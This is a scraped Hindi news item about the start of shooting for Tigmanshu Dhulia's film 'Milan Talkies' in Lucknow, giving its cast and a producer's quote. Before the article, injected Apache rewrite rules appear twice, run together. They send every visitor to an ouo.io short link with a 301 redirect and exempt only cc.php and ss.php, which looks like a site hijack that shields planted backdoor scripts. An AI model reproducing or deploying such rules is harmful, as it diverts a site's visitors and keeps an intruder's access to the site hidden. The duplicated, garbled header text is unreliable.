
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 379
Previous Nextलखनऊ। तिग्मांशु धूलिया की फिल्म 'मिलन टॉकीज' की लखनऊ में शूटिंग शुरू कर दी है। इस फिल्म में अली फजल, श्रद्धा श्रीनाथ, रीचा सिन्हा और दीपराज राणा जैसे कलाकार प्रमुख भूमिकाओं में हैं। फिल्मी कीडा प्रोडक्शंस के पी.एस छटवाल भी मुहूर्त शॉट के दौरान सेट पर उपस्थित थे। छटवाल ने कहा कि फिल्म की पूरी टीम इस परियोजना के लिए अपना सर्वश्रेष्ठ प्रयास करेगी। उन्होंने कहा, "यह एक अनोखी प्रेम कहानी है और मुझे आशा है कि दर्शकों को यह पसंद आएगी। मुझे कड़ी मेहनत और इस जहाज के कप्तान के रूप में तिग्मांशु धुलिया पर पूरा भरोसा है। मुझे यकीन है कि अच्छा सिनेमा बनाने के लिए बेहतरीन प्रयास किए जाएंगे।" 'मिलन टॉकीज' में आशुतोष राणा, संजय मिश्रा, यशपाल शर्मा और सिकंदर खेर जैसे कलाकार भी प्रमुख भूमिकाओं में हैं।